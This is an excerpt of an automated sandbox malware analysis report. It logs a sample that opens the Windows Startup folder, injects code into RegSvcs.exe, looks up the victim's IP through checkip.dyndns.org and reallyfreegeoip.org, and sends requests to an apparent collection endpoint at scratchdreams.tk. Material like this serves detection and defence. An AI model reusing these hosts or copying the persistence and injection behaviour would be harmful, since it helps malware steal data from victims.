Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0033979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	6_2_00339B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00335C97 FindFirstFileW,FindNextFileW,FindClose,	6_2_00335C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 008EFCD1h	7_2_008EFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 008EEFDDh	7_2_008EEDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 008EF967h	7_2_008EEDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_008EE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_008EE943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_008EEB23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7CB61h	7_2_04F7C8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F70751h	7_2_04F704A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7C709h	7_2_04F7C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7F6D1h	7_2_04F7F428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7D869h	7_2_04F7D5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F71011h	7_2_04F70D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7CFB9h	7_2_04F7CD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F715D8h	7_2_04F71506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7E119h	7_2_04F7DE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7F279h	7_2_04F7EFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7BA01h	7_2_04F7B758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7E9C9h	7_2_04F7E720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7FB29h	7_2_04F7F880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F702F1h	7_2_04F70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7C2B1h	7_2_04F7C008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F715D8h	7_2_04F711C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7D411h	7_2_04F7D168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F70BB1h	7_2_04F70900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7E571h	7_2_04F7E2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7DCC1h	7_2_04F7DA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7BE59h	7_2_04F7BBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7EE21h	7_2_04F7EB78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 04F7B5A9h	7_2_04F7B300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06058945h	7_2_06058608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 060558C1h	7_2_06055618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06055D19h	7_2_06055A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_060536CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06056171h	7_2_06055EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 060565C9h	7_2_06056320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06056A21h	7_2_06056778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_060533A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_060533B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06056E79h	7_2_06056BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 060502E9h	7_2_06050040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 060572FAh	7_2_06057050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06050741h	7_2_06050498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06057751h	7_2_060574A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06050B99h	7_2_060508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06057BA9h	7_2_06057900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06050FF1h	7_2_06050D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06058001h	7_2_06057D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06055441h	7_2_06055198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06058459h	7_2_060581B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00AFFCD1h	10_2_00AFFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00AFEFDDh	10_2_00AFEDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00AFF967h	10_2_00AFEDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_00AFE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_00AFE943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_00AFEB23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06378945h	10_2_06378608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063758C1h	10_2_06375618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06375D19h	10_2_06375A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06376171h	10_2_06375EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063765C9h	10_2_06376320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06376A21h	10_2_06376778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_063733B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_063733A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06376E79h	10_2_06376BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063772FAh	10_2_06377050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063702E9h	10_2_06370040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06377751h	10_2_063774A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06370741h	10_2_06370498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06370B99h	10_2_063708F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06377BA9h	10_2_06377900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06378001h	10_2_06377D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06370FF1h	10_2_06370D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06378459h	10_2_063781B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06375441h	10_2_06375198

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View	IP Address: 104.21.27.85 104.21.27.85

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49738 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49754 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0019CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0019CE44

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com(
Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
